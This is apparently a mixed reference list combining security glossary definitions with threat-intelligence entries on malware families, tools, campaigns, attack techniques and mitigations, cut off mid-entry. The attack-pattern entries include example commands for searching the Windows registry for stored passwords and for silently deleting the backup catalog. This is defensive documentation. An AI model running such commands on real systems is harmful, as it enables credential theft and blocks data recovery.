Definition: Hardware, software, databases, and relevant documentation for an information system at a given point in time.

Term: ciphertext
Definition: Encrypted (enciphered) data.

Term: data reconstruction
Definition: Privacy attacks that reconstruct sensitive data in a model’s training data from aggregate information.

Name: Pupy
Type: tool
Description: Pupy is an open source, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool. It is written in Python and can be generated as a payload in several different ways (Windows exe, Python file, PowerShell oneliner/file, Linux elf, APK, Rubber Ducky, etc.). Pupy is publicly available on GitHub.

Term: Content consumer
Definition: A product that accepts existing SCAP source data stream content, processes it, and produces SCAP result data streams

Name: FYAnti
Type: malware
Description: FYAnti is a loader that has been used by menuPass since at least 2020, including to deploy QuasarRAT.

Term: risk executive (function)
Definition: An individual or group within an organization, led by the senior accountable official for risk management, that helps to ensure that security risk considerations for individual systems, to include the authorization decisions for those systems, are viewed from an organization-wide perspective with regard to the overall strategic goals and objectives of the organization in carrying out its missions and business functions; and managing risk from individual systems is consistent across the organization, reflects organizational risk tolerance, and is considered along with other organizational risks affecting mission/business success.

Term: concept of operations
Definition: Verbal and graphic statement, in broad outline, of an organization’s assumptions or intent in regard to an operation or series of operations of new, modified, or existing organizational systems.

Term: Data Historian
Definition: A centralized database supporting data analysis using statistical process control techniques.

Term: security control
Definition: A safeguard or countermeasure prescribed for an information system or an organization designed to protect the confidentiality, integrity, and availability of its information and to meet a set of defined security requirements.

Term: Cryptoperiod
Definition: The time span during which a specific key is authorized for use or in which the keys for a given system may remain in effect.

Term: external assessment engagement
Definition: Formal engagement led by a third-party assessment organization that determines element judgments.

Term: key
Definition: The parameter of a block cipher that determines the selection of a permutation from the block cipher family.

Name: Data Destruction
Type: attack-pattern
Description: Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives. Common operating system file deletion commands such as <code>del</code> and <code>rm</code> often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from Disk Content Wipe and Disk Structure Wipe because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.

Adversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable. In some cases politically oriented image files have been used to overwrite data.

To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like Valid Accounts, OS Credential Dumping, and SMB/Windows Admin Shares..

In cloud environments, adversaries may leverage access to delete cloud storage objects, machine images, database instances, and other infrastructure crucial to operations to damage an organization or their customers. Similarly, they may delete virtual machines from on-prem virtualized environments.

Term: information systems security (INFOSEC)
Definition: The protection of information systems against unauthorized access to or modification of information, whether in storage, processing or transit, and against the denial of service to authorized users, including those measures necessary to detect, document, and counter such threats. See information assurance (IA).

Name: Crocodilus
Type: malware
Description: Crocodilus is an Android banking Trojan that was discovered in March 2025. Crocodilus targeted users worldwide, including Turkey, Poland, Argentina, Brazil, Spain, the United States, Indonesia and India. Crocodilus has been customized based on the target location. For example, Crocodilus mimicked major Turkish and Spanish banks for users in Turkey and Spain, while users in Poland saw Facebook advertisements that promoted Crocodilus to claim bonus points.

Term: COMSEC demilitarization
Definition: The process of preparing National Security System equipment for disposal by extracting all CCI, classified, or CRYPTO- marked components for their secure destruction, as well as defacing and disposing of the remaining equipment hulk.

Term: systems privacy engineering
Definition: Process that captures and refines privacy requirements and ensures their integration into information technology component products and information systems through purposeful privacy design or configuration.

Term: Security Capability
Definition: A combination of mutually-reinforcing security controls (i.e., safeguards and countermeasures) implemented by technical means (i.e., functionality in hardware, software, and firmware), physical means (i.e., physical devices and protective measures), and procedural means (i.e., procedures performed by individuals).

Name: Archive Collected Data
Type: attack-pattern
Description: An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.

Both compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.

Name: Vulnerabilities
Type: attack-pattern
Description: Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.

An adversary may monitor vulnerability disclosures/databases to understand the state of existing, as well as newly discovered, vulnerabilities. There is usually a delay between when a vulnerability is discovered and when it is made public. An adversary may target the systems of those known to conduct vulnerability research (including commercial vendors). Knowledge of a vulnerability may cause an adversary to search for an existing exploit (i.e. Exploits) or to attempt to develop one themselves (i.e. Exploits).

Term: Plan of Action and Milestones4
Definition: A document for a system that “identifies tasks needing to be accomplished. It details resources required to accomplish the elements of the plan, any milestones in meeting the tasks, and scheduled completion dates for the milestones.” [13]

Term: Ephemeral Key
Definition: A cryptographic key that is generated for each execution of a key-establishment process and that meets other requirements of the key type (e.g., unique to each message or session).

Name: Resource Hijacking
Type: attack-pattern
Description: Adversaries may leverage the resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability. 

Resource hijacking may take a number of different forms. For example, adversaries may:

* Leverage compute resources in order to mine cryptocurrency
* Sell network bandwidth to proxy networks
* Generate SMS traffic for profit
* Abuse cloud-based messaging services to send large quantities of spam messages

In some cases, adversaries may leverage multiple types of Resource Hijacking at once.

Term: poisoning attacks
Definition: Adversarial attacks in which an adversary interferes with a model during its training stage, such as by inserting malicious training data (data poisoning) or modifying the training process itself (model poisoning).

Term: Domain Name
Definition: A label that identifies a network domain using the Domain Naming System.

Term: NIST Special Publication
Definition: A type of publication issued by NIST. Specifically, the Special Publication 800-series reports on the Information Technology Laboratory's research, guidelines, and outreach efforts in computer security, and its collaborative activities with industry, government, and academic organizations.

Name: IcedID
Type: malware
Description: IcedID is a modular banking malware designed to steal financial information that has been observed in the wild since at least 2017. IcedID has been downloaded by Emotet in multiple campaigns.

Term: SIS
Definition: A system that is composed of sensors, logic solvers, and final control elements whose purpose is to take the process to a safe state when predetermined conditions are violated. Other terms commonly used include emergency shutdown system (ESS), safety shutdown system (SSD), and safety interlock system (SIS).

Term: encryption
Definition: The translation of data into a form that is unintelligible without a deciphering mechanism.

Name: 3PARA RAT
Type: malware
Description: 3PARA RAT is a remote access tool (RAT) programmed in C++ that has been used by Putter Panda.

Term: Bernoulli Random Variable
Definition: A random variable that takes on the value of one with probability p and the value of zero with probability 1-p.

Term: IS
Definition: A computer-based system used by an issuer to perform the functions necessary for PIV Card or Derived PIV Credential issuance as per [FIPS 201-2].

Term: Deterministic Random Bit Generator
Definition: See Deterministic random bit generator (DRBG).

Term: Uniform Resource Identifier
Definition: A compact sequence of characters that identifies an abstract or physical resource available on the Internet. The syntax used for URIs is defined in.

Term: party
Definition: An individual (person), organization, device or process. Used interchangeably with “party.”

Name: RAPIDPULSE
Type: malware
Description: RAPIDPULSE is a web shell that exists as a modification to a legitimate Pulse Secure file that has been used by APT5 since at least 2021.

Term: media
Definition: Physical devices or writing surfaces including, but not limited to, magnetic tapes, optical disks, magnetic disks, large-scale integration (LSI) memory chips, and printouts (but excluding display media) onto which information is recorded, stored, or printed within system.

Term: Federation Assurance Level (FAL)
Definition: A category that describes the process used in a federation transaction to communicate authentication events and subscriber attributes to an RP.

Term: Last Numbers Dialed
Definition: a log of last numbers dialed, similar to that kept on the phone, but kept on the SIM without a timestamp.

Term: PIV Card
Definition: The physical artifact (e.g., identity card, “smart” card) issued to an applicant by an issuer that contains stored identity markers or credentials (e.g., a photograph, cryptographic keys, digitized fingerprint representations) so that the claimed identity of the cardholder can be verified against the stored credentials by another person (human readable and verifiable) or an automated process (computer readable and verifiable).

Term: <em>Q</em>
Definition: A bit string representation of the octet length of P.

Term: little-endian
Definition: The property of a byte string having its bytes positioned in order of increasing significance. In particular, the leftmost (first) byte is the least significant, and the rightmost (last) byte is the most significant. The term “little-endian” may also be applied in the same manner to bit strings (e.g., the 8-bit string 11010001 corresponds to the byte&nbsp;<span class="math-tex">\(2^0+2^1+2^3+2^7=139\)</span>).

Name: Email Spoofing
Type: attack-pattern
Description: Adversaries may fake, or spoof, a sender’s identity by modifying the value of relevant email headers in order to establish contact with victims under false pretenses. In addition to actual email content, email headers (such as the FROM header, which contains the email address of the sender) may also be modified. Email clients display these headers when emails appear in a victim's inbox, which may cause modified emails to appear as if they were from the spoofed entity.

Enterprise environments can use Domain-based Message Authentication, Reporting, and Conformance (DMARC) as an email authentication protocol that references results of the Sender Policy Framework (SPF) and DomainKeys Identified Mail (DKIM) configurations. SPF and DKIM are configured separately in DNS: SPF verifies that the sending server is authorized for the domain, while DKIM uses a digital signature to verify email integrity and domain authentication. Together, they validate email authenticity and specify how receiving servers should handle authentication failures. Without enforced identity authentication, adversaries may compromise the integrity of an authentication check with altered headers that would not have otherwise passed.

An example of a weak or absent DMARC policy is `v=DMARC1; p=none; fo=1;`. The `p=none`. The `p=none` indicates no action should be taken, and therefore no filtering action will take place, even if an email fails authentication checks (i.e., SPF and/or DKIM fail). When a DMARC policy indicates no action, the email will still be delivered to the victim’s inbox. 

Adversaries have abused weak or absent DMARC policies to circumvent authentication checks and conceal social engineering attempts. Adversaries can alter email headers to include legitimate domain names with fake usernames or impersonate legitimate users via Impersonation for Phishing. Additionally, adversaries may abuse Microsoft 365’s Direct Send functionality to spoof internal users by using internal devices like printers to send emails without authentication.

Term: Network Discovery
Definition: The process of discovering active and responding hosts on a network, identifying weaknesses, and learning how the network operates.

Term: Independent Qualified Reviewer
Definition: A Reviewer tasked by NIST with making a recommendation to NIST regarding public review or listing of the checklist.

Term: Microservice
Definition: A set of containers that work together to compose an application.

Term: digital signature
Definition: The result of a cryptographic transformation of data that, when properly implemented with a supporting infrastructure and policy, provides the services of: 
1. Origin (i.e., source) authentication, 
2. Data integrity authentication, and 
3. Support for signer non-repudiation.

Term: level 2
Definition: The risk management level that addresses the risk strategy, policies, and procedures for a specific mission or business process (but not the entire organization). Also refers to any element that is meant to be evaluated by Level 2 personnel.

Term: critical infrastructure
Definition: System and assets, whether physical or virtual, so vital to the United States that the incapacity or destruction of such systems and assets would have a debilitating impact on security, national economic security, national public health or safety, or any combination of those matters.

Term: TCP
Definition: TCP is one of the main protocols in TCP/IP networks. Whereas the IP protocol deals only with packets, TCP enables two hosts to establish a connection and exchange streams of data. TCP guarantees delivery of data and also guarantees that packets will be delivered in the same order in which they were sent.

Term: IPsec
Definition: A protocol that adds security features to the standard IP protocol to provide confidentiality and integrity services.

Term: ciphertext
Definition: The confidential form of the plaintext that is the output of the authenticated-encryption function.

Term: Block Cipher Algorithm
Definition: A symmetric-key cryptographic algorithm that transforms one block of information at a time using a cryptographic key. For a block cipher algorithm, the length of the input block is the same as the length of the output block.

Term: flaw
Definition: Imperfection or defect.

Term: keying material
Definition: A bit string such that non-overlapping segments of the string (with the required lengths) can be used as cryptographic keys or other secret (pseudorandom) parameters.

Term: smart data
Definition: Association of authority, access requirements, retention provenance and any additional information with a data object; smart data includes data provenance and data tagging.

Name: Credentials in Registry
Type: attack-pattern
Description: Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.

Example commands to find Registry keys related to password information: 

* Local Machine Hive: <code>reg query HKLM /f password /t REG_SZ /s</code>
* Current User Hive: <code>reg query HKCU /f password /t REG_SZ /s</code>

Term: Cryptographic hash function
Definition: A function that maps a bit string of arbitrary length to a fixed-length bit string. Approved hash functions are designed to satisfy the following properties:
1.     (One-way) It is computationally infeasible to find any input that maps to any pre-specified output, and
2.     (Collision resistant) It is computationally infeasible to find any two distinct inputs that map to the same output.
Approved hash functions are specified in FIPS 180.

Name: PsExec
Type: tool
Description: PsExec is a free Microsoft tool that can be used to execute a program on another computer. It is used by IT administrators and attackers.

Name: MMC
Type: attack-pattern
Description: Adversaries may abuse mmc.exe to proxy execution of malicious .msc files. Microsoft Management Console (MMC) is a binary that may be signed by Microsoft and is used in several ways in either its GUI or in a command prompt. MMC can be used to create, open, and save custom consoles that contain administrative tools created by Microsoft, called snap-ins. These snap-ins may be used to manage Windows systems locally or remotely. MMC can also be used to open Microsoft created .msc files to manage system configuration.

For example, <code>mmc C:\Users\foo\admintools.msc /a</code> will open a custom, saved console msc file in author mode. Another common example is <code>mmc gpedit.msc</code>, which will open the Group Policy Editor application window. 

Adversaries may use MMC commands to perform malicious tasks. For example, <code>mmc wbadmin.msc delete catalog -quiet</code> deletes the backup catalog on the system (i.e. Inhibit System Recovery) without prompts to the user (Note: <code>wbadmin.msc</code> may only be present by default on Windows Server operating systems).

Adversaries may also abuse MMC to execute malicious .msc files. For example, adversaries may first create a malicious registry Class Identifier (CLSID) subkey, which uniquely identifies a Component Object Model class object. Then, adversaries may create custom consoles with the “Link to Web Address” snap-in that is linked to the malicious CLSID subkey. Once the .msc file is saved, adversaries may invoke the malicious CLSID payload with the following command: <code>mmc.exe -Embedding C:\path\to\test.msc</code>.

Term: <em>(n, e, d, p, q, dP, dQ, qInv)</em>
Definition: RSA private key in the Chinese Remainder Theorem (CRT) format.

Term: gap analysis
Definition: The process of comparing current learning program or activity performance with the desired, expected performance.

Term: bit
Definition: Biometric Information Template – a [CARD-BIO] data structure indicating Card capability

Term: on behalf of (an agency)
Definition: A situation that occurs when: (i) a non-executive branch entity uses or operates an information system or maintains or collects information for the purpose of processing, storing, or transmitting federal information; and (ii) those activities are not incidental to providing a service or product to the Government.

Term: OLIR Developer
Definition: A person, team, or organization that creates an Informative Reference and submits it to the OLIR Program.

Name: OSX/Shlayer
Type: malware
Description: OSX/Shlayer is a Trojan designed to install adware on macOS that was first discovered in 2018.

Term: pairing code
Definition: An 8-digit code used to establish a relationship between the PIV Card and a device for the purpose of creating the virtual contact interface after secure messaging has been established.

Term: X.509 certificate
Definition: The X.509 public-key certificate or the X.509 attribute certificate, as defined by the ISO/ITU-T[9] X.509 standard. Most commonly (including in this document), an X.509 certificate refers to the X.509 public-key certificate.

Term: MAC
Definition: A means of restricting access to system resources based on the sensitivity (as represented by a label) of the information contained in the system resource and the formal authorization (i.e., clearance) of users to access information of such sensitivity.

Term: Tailored Security Control Baseline
Definition: A set of security controls resulting from the application of tailoring guidance to a security control baseline. See Tailoring.

Term: Cyber Threat
Definition: An event or condition that has the potential for causing asset loss and the undesirable consequences or impact from such loss.

Term: injection attack
Definition: An attack in which an attacker supplies untrusted biometric information or media into a program or process. For example, this could include injecting a falsified image of identity evidence, a forged video of a user, or a morphed image to defeat evidence validation technology or biometric and visual comparisons for user verification.

Term: trustworthy information system
Definition: An information system that is believed to be capable of operating within defined levels of risk despite the environmental disruptions, human errors, structural failures, and purposeful attacks that are expected to occur in its environment of operation.

Term: positioning
Definition: The ability to accurately and precisely determine one’s location and orientation two-dimensionally (or three-dimensionally, when required) referenced to a standard reference frame, such as the World Geodetic System 1984, WGS 84, or the International Terrestrial Reference Frame ITRF2020.

Term: Approved hash algorithms
Definition: Cryptographic hash algorithms specified in [FIPS 180-3].

Term: countermeasures
Definition: Actions, devices, procedures, techniques, or other measures that reduce the vulnerability of an information system. Synonymous with security controls and safeguards.

Name: Waterbear
Type: malware
Description: Waterbear is modular malware attributed to BlackTech that has been used primarily for lateral movement, decrypting, and triggering payloads and is capable of hiding network behaviors.

Term: Pseudorandom
Definition: A process (or data produced by a process) whose outcome is deterministic yet also appears effectively random if the internal action of the process is hidden from observation. For cryptographic purposes, “effectively random” means “computationally indistinguishable from random within the limits of the intended security strength.”

Term: system security plan
Definition: Formal document that provides an overview of the security requirements for an information system or an information security program and describes the security controls in place or planned for meeting those requirements. 
See System Security Plan.

Term: secret key
Definition: A single cryptographic key that is used with a symmetric-key cryptographic algorithm, is uniquely associated with one or more entities and is not made public (i.e., the key is kept secret). A secret key is also called a Symmetric key. The use of the term “secret” in this context does not imply a classification level but rather implies the need to protect the key from disclosure.

Term: risk treatment
Definition: Process to modify risk.

Term: basic testing
Definition: A test methodology that assumes no knowledge of the internal structure and implementation detail of the assessment object.

Term: identity proofing
Definition: The process by which a CSP or Registration Authority (RA) collect, validate and verify information about a person for the purpose of issuing credentials to that person.

Term: <strong>Shall</strong>
Definition: Used to indicate a requirement of this standard.

Name: Exploit Protection
Type: course-of-action
Description: Deploy capabilities that detect, block, and mitigate conditions indicative of software exploits. These capabilities aim to prevent exploitation by addressing vulnerabilities, monitoring anomalous behaviors, and applying exploit-mitigation techniques to harden systems and software.

Operating System Exploit Protections:

- Use Case: Enable built-in exploit protection features provided by modern operating systems, such as Microsoft's Exploit Protection, which includes techniques like Data Execution Prevention (DEP), Address Space Layout Randomization (ASLR), and Control Flow Guard (CFG).
- Implementation: Enforce DEP for all programs and enable ASLR to randomize memory addresses used by system and application processes. Windows: Configure Exploit Protection through the Windows Security app or deploy settings via Group Policy.
`ExploitProtectionExportSettings.exe -path "exploit_settings.xml"`
Linux: Use Kernel-level hardening features like SELinux, AppArmor, or GRSEC to enforce memory protections and prevent exploits.

Third-Party Endpoint Security:

- Use Case: Use endpoint protection tools with built-in exploit protection, such as enhanced memory protection, behavior monitoring, and real-time exploit detection.
- Implementation: Deploy tools to detect and block exploitation attempts targeting unpatched software.

Virtual Patching:
- Use Case: Use tools to implement virtual patches that mitigate vulnerabilities in applications or operating systems until official patches are applied.
- Implementation: Use Intrusion Prevention System (IPS) to block exploitation attempts on known vulnerabilities in outdated applications.

Hardening Application Configurations:

- Use Case: Disable risky application features that can be exploited, such as macros in Microsoft Office or JScript in Internet Explorer.
- Implementation: Configure Microsoft Office Group Policies to disable execution of macros in downloaded files.

Term: Ephemeral Key
Definition: A cryptographic key that is generated for each execution of a cryptographic process (e.g., key establishment) and that meets other requirements of the key type (e.g., unique to each message or session).

Term: Key certification
Definition: In a Public Key Infrastructure (PKI), a process that permits keys or key components to be unambiguously associated with their certificate sources (e.g., using digital signatures to associate public-key certificates with the certification authorities that issued them).

Term: Subkey Generation
Definition: An algorithm that derives subkeys from a key.

Term: Application-Proxy Gateway
Definition: A firewall capability that combines lower-layer access control with upper layer-functionality, and includes a proxy agent that acts as an intermediary between two hosts that wish to communicate with each other.

Term: trustworthiness (system)
Definition: The degree to which an information system (including the information technology components that are used to build the system) can be expected to preserve the confidentiality, integrity, and availability of the information being processed, stored, or transmitted by the system across the full range of threats and individuals’ privacy.

Term: ABAC
Definition: An access control approach in which access is mediated based on attributes associated with subjects (requesters) and the objects to be accessed. Each object and subject has a set of associated attributes, such as location, time of creation, access rights, etc. Access to an object is authorized or denied depending upon whether the required (e.g., policy-defined) correlation can be made between the attributes of that object and of the requesting subject.

Term: l
Definition: The length in bits of a MacTag, or the length in bits of a truncated message digest (used, for example, by a digital signature algorithm).

Term: concept source
Definition: A document or other resource that contains definitions of concepts.

Term: <em>incs(X)</em>
Definition: The output of incrementing the right-most s bits of the bit string X, regarded as the binary representation of an integer, by 1 modulo 2s.

Term: c
Definition: Ciphertext (expressed as an integer).

Term: <strong>client</strong>
Definition: A function that uses the PKI to obtain certificates and validate certificates and signatures. Client functions are present in CAs and end entities. Client functions may also be present in entities that are not certificate holders. That is, a system or user that verifies signatures and validation paths is a client, even if it does not hold a certificate itself.

Name: CostaRicto
Type: campaign
Description: CostaRicto was a suspected hacker-for-hire cyber espionage campaign that targeted multiple industries worldwide, with a large number being financial institutions. CostaRicto actors targeted organizations in Europe, the Americas, Asia, Australia, and Africa, with a large concentration in South Asia (especially India, Bangladesh, and Singapore), using custom malware, open source tools, and a complex network of proxies and SSH tunnels.

Term: <em>R</em>
Definition: The constant within the algorithm for the block multiplication operation.

Term: assurance evidence
Definition: The information upon which decisions regarding assurance, trustworthiness, and risk of the solution are substantiated.
Note: Assurance evidence is specific to an agreed-to set of claims. The security perspective focuses on assurance evidence for security-relevant claims whereas other engineering disciplines may have their own focus (e.g., safety).

Term: organizational user
Definition: An organizational employee or an individual the organization deems to have equivalent status of an employee including, for example, contractor, guest researcher, individual detailed from another organization. Policy and procedures for granting equivalent status of employees to individuals may include need-to-know, relationship to the organization, and citizenship.

Name: Create or Modify System Process
Type: attack-pattern
Description: Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services. On macOS, launchd processes known as Launch Daemon and Launch Agent are run to finish system initialization and load user specific parameters. 

Adversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect. 

Services, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges.

Name: Parent PID Spoofing
Type: attack-pattern
Description: Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the <code>CreateProcess</code> API call, which supports a parameter that defines the PPID to use. This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via <code>svchost.exe</code> or <code>consent.exe</code>) rather than the current user context.

Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of PowerShell/Rundll32 to be <code>explorer.exe</code> rather than an Office document delivered as part of Spearphishing Attachment. This spoofing could be executed via Visual Basic within a malicious Office document or any code that can perform Native API.

Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as <code>lsass.exe</code>), causing the new process to be elevated via the inherited access token.

Name: PinchDuke
Type: malware
Description: PinchDuke is malware that was used by APT29 from 2008 to 2010.

Term: information security continuous monitoring (ISCM) strategy
Definition: A strategy that establishes an ISCM program.

Term: Central Oversight Authority
Definition: The Key Management Infrastructure (KMI) entity that provides overall KMI data synchronization and system security oversight for an organization or set of organizations.

Term: Virtual Local Area Network
Definition: A broadcast domain that is partitioned and isolated within a network at the data link layer. A single physical local area network (LAN) can be logically partitioned into multiple, independent VLANs; a group of devices on one or more physical LANs can be configured to communicate within the same VLAN, as if they were attached to the same physical LAN.

Term: Pharming
Definition: Using technical means to redirect users into accessing a fake Web site masquerading as a legitimate one and divulging personal information.

Term: re-identification precision
Definition: The ratio of correct re-identifications to the sum of correct and incorrect apparent re-identifications.

Term: common control
Definition: A security control that is inherited by one or more organizational information systems.

Term: Network Sniffing
Definition: A passive technique that monitors network communication, decodes protocols, and examines headers and payloads for information of interest. It is both a review technique and a target identification and analysis technique.

Term: certification
Definition: a formal process for testing components or systems against a specified set ofsecurity requirements. Certification is normally performed by an independent reviewer rather than one involved in building the system. Certification can be part of the review of security controls identified in OMB Circular A-130, Appendix III, which calls for security reviews to assure that management, operational, and technical controls are appropriate and functioning effectively. (See Accreditation.)

Term: HTTPS
Definition: A standard method for communication between clients and Web servers.

Term: Free Field
Definition: In the RBG-based construction of IVs, the field whose contents are not restricted.

Name: Malware
Type: attack-pattern
Description: Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.

In addition to downloading free malware from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware development, criminal marketplaces (including Malware-as-a-Service, or MaaS), or from individuals. In addition to purchasing malware, adversaries may steal and repurpose malware from third-party entities (including other adversaries).

Term: security level
Definition: Includes the combination of classification level, releasability, and dissemination controls (e.g., sensitive compartmented information (SCI) compartment(s), special access program (SAP) identifier(s), alternative compensatory control measures (ACCM) nickname(s)) for an object or system.

Term: level 1
Definition: The risk management level that addresses overall risk strategy, policies, and procedures for the entire organization. Also refers to any element that is meant to be evaluated by Level 1 personnel.

Term: Information System Security Engineering
Definition: Process that captures and refines information security requirements and ensures their integration into information technology component products and information systems through purposeful security design or configuration.

Term: Enrollment
Definition: See “Identity Registration”.

Term: anomaly
Definition: Condition that deviates from expectations based on requirements specifications, design documents, user documents, or standards, or from someone’s perceptions or experiences.

Term: memorized secret
Definition: A string of characters (letters, numbers and other symbols) that are used to authenticate an identity or to verify access authorization.

Term: authenticate
Definition: The act of verifying that the subject has been authorized to use the presented identifier by a trusted identity provider organization.

Term: key transport
Definition: A (pair-wise) key-establishment procedure whereby one party (i.e., the sender) selects a value for the secret keying material and then securely distributes the value to another party (i.e., the receiver). Contrast with key agreement.

Name: admin@338
Type: intrusion-set
Description: admin@338 is a China-based cyber threat group. It has previously used newsworthy events as lures to deliver malware and has primarily targeted organizations involved in financial, economic, and trade policy, typically using publicly available RATs such as PoisonIvy, as well as some non-public backdoors.

Name: Emond
Type: attack-pattern
Description: Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond). Emond is a Launch Daemon that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at <code>/sbin/emond</code> will load any rules from the <code>/etc/emond.d/rules/</code> directory and take action once an explicitly defined event takes place.

The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path <code>/private/var/db/emondClients</code>, specified in the Launch Daemon configuration file at<code>/System/Library/LaunchDaemons/com.apple.emond.plist</code>.

Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication. Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the Launch Daemon service.

Term: regression
Definition: A statistical technique used to predict the value of a variable based on the relationship between explanatory variables.

Term: <em>X⊕Y</em>
Definition: The bitwise exclusive-OR of bit strings X and Y whose bit lengths are equal.

Term: Verifier Impersonation
Definition: Tricking individuals into disclosing sensitive personal information by claiming to be a trustworthy entity in an electronic communication (e.g., internet web sites).

Term: Control Item
Definition: See Security Control Item.

Term: Key management components
Definition: The software module applications and hardware security modules (HSMs) that are used to generate, establish, distribute, store, account for, suspend, revoke, or destroy cryptographic keys and metadata.

Term: Personnel-security compromise
Definition: The accidental or intentional action of any person that reduces the security of the FCKMS and/or compromises any of its keys and sensitive metadata.

Term: attribute
Definition: A quality or characteristic ascribed to someone or something. An identity attribute is an attribute about the identity of a subscriber (e.g., name, date of birth, address).

Name: Qilin
Type: malware
Description: Qilin is a ransomware family operated as a ransomware-as-a-service (RaaS) that has been active since at least 2022. It includes variants written in Go and Rust capable of targeting Windows, Linux, and VMware ESXi environments. Qilin shares functionality overlaps with Black Basta, REvil, and BlackCat ransomware. Qilin affiliates have targeted multiple entities worldwide with the majority of victims in the US, France, Canada, and the UK, primarily in the manufacturing, technology, financial services, and healthcare sectors.

Term: system boundary
Definition: All components of an information system to be authorized for operation by an authorizing official and excludes separately authorized systems, to which the information system is connected.

Name: Remote Email Collection
Type: attack-pattern
Description: Adversaries may target an Exchange server, Office 365, or Google Workspace to collect sensitive information. Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network. Adversaries may also access externally facing Exchange services, Office 365, or Google Workspace to access email using credentials or access tokens. Tools such as MailSniper can be used to automate searches for specific keywords.

Term: access control
Definition: The process of granting or denying specific requests for obtaining and using information and related information processing services; and to enter specific physical facilities (e.g., Federal buildings, military establishments, and border crossing entrances).

Term: CPE Attribute Comparison
Definition: The first phase of CPE name matching, where a matching engine compares each of the A-V pairs of a source CPE name to the corresponding A-V pair of a target name in order to specify one of four possible logical attribute comparison relations for each attribute in a CPE name.

Term: PKC
Definition: Encryption system that uses a public-private key pair for encryption and/or digital signature.

Term: security marking
Definition: The means used to associate a set of security attributes with objects in a human-readable form in order to enable organizational, process-based enforcement of information security policies.

Term: Customer-Specifiable
Definition: The features of the MSR-compliant system that are set with a default value by the manufacturer, but can be reset after delivery by the customer to reflect the customer's security policy.  These features are usually reset at the time of installation by an administrator or other customer authorized person and cannot be changed without the appropriate privilege at other times.

Term: Server
Definition: A system entity that provides a service in response to requests from clients.

Term: distinguishable information
Definition: Information that can be used to identify an individual.

Term: I&A
Definition: The process of establishing the identity of an entity interacting with a system.

Term: Context of Use
Definition: The purpose for which PII is collected, stored, used, processed, disclosed, or disseminated.

Term: Address Resolution Protocol (ARP)
Definition: A protocol used to obtain a node’s physical address. A client station broadcasts an ARP request onto the network with the Internet Protocol (IP) address of the target node with which it wishes to communicate, and with that address the node responds by sending back its physical address so that packets can be transmitted to it.

Term: Audit administrator
Definition: A member of the organization who inspects reports and risk assessments from one or more analyzers as well as organization-specific criteria to ensure that an app meets the security requirements of the organization.

Name: CreepySnail
Type: malware
Description: CreepySnail is a custom PowerShell implant that has been used by POLONIUM since at least 2022.

Term: safeguards
Definition: A safeguard or countermeasure prescribed for an information system or an organization designed to protect the confidentiality, integrity, and availability of its information and to meet a set of defined security requirements.

Term: Enrollment
Definition: The process through which an Applicant applies to become a Subscriber of a CSP and an RA validates the identity of the Applicant on behalf of the CSP.

Term: supplier
Definition: Organization or individual that enters into an agreement with the acquirer or integrator for the supply of a product or service. This includes all suppliers in the supply chain, developers or manufacturers of systems, system components, or system services; systems integrators; suppliers; product resellers; and third-party partners.

Name: Do Not Mitigate
Type: course-of-action
Description: The Do Not Mitigate category highlights scenarios where attempting to mitigate a specific technique may inadvertently increase the organization's security risk or operational instability. This could happen due to the complexity of the system, the integration of critical processes, or the potential for introducing new vulnerabilities. Instead of direct mitigation, these situations may call for alternative strategies such as detection, monitoring, or response. The Do Not Mitigate category underscores the importance of assessing the trade-offs between mitigation efforts and overall system integrity. This mitigation can be implemented through the following measures:

Complex Systems Where Mitigation is Risky:

